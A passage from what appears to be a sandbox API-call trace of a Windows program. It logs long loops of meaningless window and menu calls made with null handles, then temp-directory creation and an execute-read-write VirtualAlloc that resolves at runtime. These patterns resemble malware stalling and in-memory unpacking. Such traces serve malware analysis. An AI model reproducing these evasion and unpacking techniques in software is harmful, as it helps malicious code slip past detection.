hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.703] GetMenu (hWnd=0x0) returned 0x0 [0100.703] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x346) returned -1 [0100.703] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.703] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.703] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.703] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.703] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.703] GetStockObject (i=6) returned 0x1b00018 [0100.703] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.703] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.703] PathFileExistsW (pszPath=0x0) returned 0 [0100.703] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.703] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.703] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.703] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.703] GetMenu (hWnd=0x0) returned 0x0 [0100.703] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.703] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.703] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.703] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.703] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.703] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.703] GetStockObject (i=6) returned 0x1b00018 [0100.704] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.704] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.704] PathFileExistsW (pszPath=0x0) returned 0 [0100.704] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.704] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.704] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.704] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.704] GetMenu (hWnd=0x0) returned 0x0 [0100.704] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x342) returned -1 [0100.704] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.704] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.704] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.704] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.704] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.704] GetStockObject (i=6) returned 0x1b00018 [0100.704] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.704] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.704] PathFileExistsW (pszPath=0x0) returned 0 [0100.704] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.704] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.704] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.704] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.704] GetMenu (hWnd=0x0) returned 0x0 [0100.704] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x250) returned -1 [0100.704] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.704] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.704] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.704] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.704] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.704] GetStockObject (i=6) returned 0x1b00018 [0100.704] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.704] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.704] PathFileExistsW (pszPath=0x0) returned 0 [0100.704] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.704] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.704] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.705] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.705] GetMenu (hWnd=0x0) returned 0x0 [0100.705] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.705] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.705] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.705] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.705] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.705] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.705] GetStockObject (i=6) returned 0x1b00018 [0100.705] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.705] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.705] PathFileExistsW (pszPath=0x0) returned 0 [0100.705] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.705] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.705] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.705] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.705] GetMenu (hWnd=0x0) returned 0x0 [0100.705] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x342) returned -1 [0100.705] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.705] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.705] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.705] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.705] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.705] GetStockObject (i=6) returned 0x1b00018 [0100.705] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.705] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.705] PathFileExistsW (pszPath=0x0) returned 0 [0100.705] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.705] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.705] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.705] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.705] GetMenu (hWnd=0x0) returned 0x0 [0100.705] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x345) returned -1 [0100.705] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.705] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.705] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.705] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.706] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.706] GetStockObject (i=6) returned 0x1b00018 [0100.706] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0100.706] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0100.706] PathFileExistsW (pszPath=0x0) returned 0 [0100.706] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0100.706] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=837, y=453)) returned 1 [0100.706] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0100.706] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0100.706] GetMenu (hWnd=0x0) returned 0x0 [0100.706] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x343) returned -1 [0100.706] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0100.706] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0100.706] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0100.706] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0100.706] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0100.715] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d12f8 | out: hHeap=0x34d0000) returned 1 [0100.715] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d12d0 | out: hHeap=0x34d0000) returned 1 [0100.715] HeapFree (in: hHeap=0x34d0000, dwFlags=0x0, lpMem=0x34d12c0 | out: hHeap=0x34d0000) returned 1 [0100.715] SendMessageA (hWnd=0x0, Msg=0x418, wParam=0x0, lParam=0x0) returned 0x0 [0100.715] SetRect (in: lprc=0x18f56c, xLeft=0, yTop=0, xRight=0, yBottom=0 | out: lprc=0x18f56c) returned 1 [0100.715] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x26 [0100.715] GetTempPathA (in: nBufferLength=0x27, lpBuffer=0x30d130 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0100.715] LoadLibraryA (lpLibFileName="kernel32") returned 0x76c20000 [0100.716] GetTempFileNameA (in: lpPathName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", lpPrefixString="", uUnique=0x0, lpTempFileName=0x18f724 | out: lpTempFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\7FD9.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\7fd9.tmp")) returned 0x7fd9 [0100.717] DeleteFileA (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\7FD9.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\7fd9.tmp")) returned 1 [0100.717] CreateDirectoryA (lpPathName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\7FD9.tmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\7fd9.tmp"), lpSecurityAttributes=0x0) returned 1 [0100.717] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualAlloc") returned 0x76c31856 [0100.717] VirtualAlloc (lpAddress=0x0, dwSize=0x32000, flAllocationType=0x3000, flProtect=0x40) returned 0x290000 [0100.718] GetDlgItem (hDlg=0x0, nIDDlgItem=200) returned 0x0 [0100.719] GetWindowRect (in: hWnd=0x0, lpRect=0x18f5f4 | out: lpRect=0x18f5f4) returned 0 [0100.719] GetDlgItem (hDlg=0x0, nIDDlgItem=149) returned 0x0 [0100.719] GetWindowRect (in: hWnd=0x0, lpRect=0x18f588 | out: lpRect=0x18f588) returned 0 [0100.719] GetUpdateRect (in: hWnd=0x1, lpRect=0x18f60c, bErase=0 | out: lpRect=0x18f60c) returned 0 [0100.719] GetForegroundWindow () returned 0x600a0 [0100.719] GetWindow (hWnd=0x0, uCmd=0x4) returned 0x0 [0100.719] GetParent (hWnd=0x0) returned 0x0 [0100.719] SendMessageA (hWnd=0x0, Msg=0x223, wParam=0x0, lParam=0x0) returned 0x0 [0100.719] SendMessageA (hWnd=0x0, Msg=0x11, wParam=0x0, lParam=0x0) returned 0x0 [0100.719] GetParent (hWnd=0x0) returned 0x0 [0100.719] SendMessageA (hWnd=0x0, Msg=0x221, wParam=0x0, lParam=0x0) returned 0x0 [0100.719] GetDlgItem (hDlg=0x0, nIDDlgItem=-232) returned 0x0 [0100.719] GetDlgItem (hDlg=0x0, nIDDlgItem=-232) returned 0x0 [0100.719] GdiplusStartup (in: token=0x18f384, input=0x18f3e4, output=0x0 | out: token=0x18f384, output=0x0) returned 0x0 [0100.731] BeginPaint (in: hWnd=0x0, lpPaint=0x18f414 | out: lpPaint=0x18f414) returned 0x0 [0100.731] EndPaint (hWnd=0x0, lpPaint=0x18f414) returned 0 [0100.732] CreateWindowExA (dwExStyle=0x0, lpClassName="button", lpWindowName=0x0, dwStyle=0x5000000b, X=250, Y=200, nWidth=32, nHeight=32, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x0 [0100.732] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.732] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.732] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.732] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.732] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.732] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.732] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.732] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.732] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.732] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.732] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.732] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.732] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.732] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.732] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.732] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.732] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.732] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.732] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.732] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.732] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.732] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.732] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.732] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.732] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.732] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.732] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.732] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.732] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.732] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.732] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.732] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.732] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.732] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.732] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.733] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.733] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.733] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.733] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.733] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.733] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.733] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.733] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.733] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.733] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.733] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.733] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.733] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.733] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.733] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.733] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.733] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.733] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.733] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.733] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.733] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.733] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.733] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.733] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.733] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.733] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.733] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.733] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.733] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.733] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.733] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.733] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.733] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.733] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.733] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.733] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.733] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.733] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.733] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.733] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.733] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.733] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.733] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.733] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.733] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.734] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.734] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.734] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.734] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.734] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.734] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.734] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.734] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.734] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.734] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.734] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.734] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.734] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.734] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.734] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.734] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.734] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.734] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.734] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.734] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.734] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.734] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.734] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.734] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.734] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.734] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.734] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.734] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.734] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.734] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.734] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.734] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.734] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.734] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.734] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.734] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.734] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.734] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.734] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.734] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.734] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.734] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.734] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.734] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.735] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.735] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.735] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.735] CheckMenuItem (hMenu=0x0, uIDCheckItem=0xd7, uCheck=0x1e) returned 0xffffffff [0100.735] CheckMenuItem (hMenu=0x0, 